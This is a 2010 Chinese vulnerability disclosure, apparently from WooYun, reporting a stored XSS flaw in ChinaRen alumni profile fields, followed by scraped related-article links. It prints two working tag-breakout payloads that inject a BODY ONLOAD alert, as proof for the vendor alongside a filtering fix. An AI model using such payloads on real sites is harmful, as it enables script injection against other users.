chinaren校友录的永久xss漏洞
漏洞详情
披露状态:
2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-27: 细节向公众公开
简要描述:
chinaren校友录的永久xss漏洞
详细说明:
chinaren校友录签名档、工作单位没有对xss做完整过滤,
签名档:
anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>
工作单位:
anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>
漏洞证明:
http://i.chinaren.com/u/anyunix@sogou
修复方案:
当然是过滤输出.
版权声明:转载请注明来源 anyunix@乌云
chinaren校友录的永久xss漏洞相关推荐
- chinaren校友录xss漏洞
漏洞详情 披露状态: 2010-07-27: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- Chinaren校友录所用的左边弹出式菜单
代码如下: <html> <head> <title>Chinaren校友录所用的左边弹出式菜单</title> <meta http-equiv ...
- Chinaren校友录
Chinaren校友录 链接:http://alumni.chinaren.com/class/class_index.jsp?classuuid=2917034545012452392 来自 &qu ...
- 如何在ChinaRen校友录中免费发多彩留言
毕业以后,浏览最多的可能就是自己校友录的留言板了.但是千篇一律的文字版面实在难以满足我们丰富多彩的需要,校友录中也提供了多彩留言功能,可以让我们发送一些动态网页元素,如影音.Flash.格式化的文字等 ...
- 还有多少人记得ChinaRen校友录,它已经502…
如今访问这个网站,它已经显示502 Bad Gateway,令人唏嘘不已-- 对于80后这一代,曾经可以通过ChinaRen还能找到当年的小学.中学同学,不知道这里有多少小伙伴用过,或者是听说过呢?
- chinaren校友录恢复重新开放_确定!九寨沟景区9月27日对外开放(试运行) 最大限量为每天5000人 各大旅企产品已上线...
东方网记者曹磊9月23日报道:今天下午,九寨沟管理局宣布,景区拟于2019年9月27日(世界旅游日)起对部分景观恢复对外开放(试运行).根据公告显示,景区将实行单日最大限量控制,每天5000人,接待对 ...
- Web安全之XSS漏洞
同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...
- XSS漏洞原理及攻击
XSS漏洞原理 XSS介绍 XSS漏洞介绍 1. 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种. ...
- 网络安全必学知识点之XSS漏洞
xss漏洞小结 一.初识XSS 1.什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆 ...
最新文章
- 2018-3-14(论文-优化问题的智能算法及其哲学内涵)笔记二(智能算法与人类智能以及遗传算法与生物进化对比)
- python解释器内建函数002
- 《税的真相》—— 读后总结
- python代码规范化_最流行的Python代码规范
- python函数“转移”
- 音视频技术开发周刊 | 206
- [react] 你有用过哪些React的UI库?它们的优缺点分别是什么
- 机器人搏击大赛冠军_机器人的江湖 谁主沉浮——2017格斗机器人大赛侧记
- 机器学习笔记-LightGBM
- 物联网大数据如何改善农业运营
- Cookie与Session的区别-总结很好的文章
- PCIE设备与HOST之间的地址转换
- VS C# 中使用番茄助手
- loadrunner录制手机app脚本
- 生成 8 / 16 / 32 位的UUID
- 河南山东商会刘继臣 全国工商联·万祥军:商协社团儒商大会
- Android 7.0修改分辨率,三星S7升级Android7.0 可调节屏幕分辨率
- Android开发本地及网络Mp3音乐播放器(五)实现专辑封面图片
- Spark伪分布式搭建与SparkYarn搭建
- STP 4 - MST 和 PVST 对比 (侧重MST)
热门文章
- php simplexml 函数,PHP中SimpleXML函数用法分析
- 前端 “一键换肤“ 的 N 种方案
- 苹果X 安兔兔HTML测试分数,安兔兔公布 iPhone XS Max 跑分成绩 超 37 万分
- opengl、opencascade、webgl、Direct3D关系
- 玛丽黛佳利用企业微信盘活自有客户池
- c# 在word插入横线
- favdb格式转换html,丢失360安全浏览器和360速度浏览器收藏夹的方法
- uniapp 微信小程序 搜索框滚动固定
- Android pad分屏遇到的一些问题
- 网络/信息安全顶刊及相关期刊会议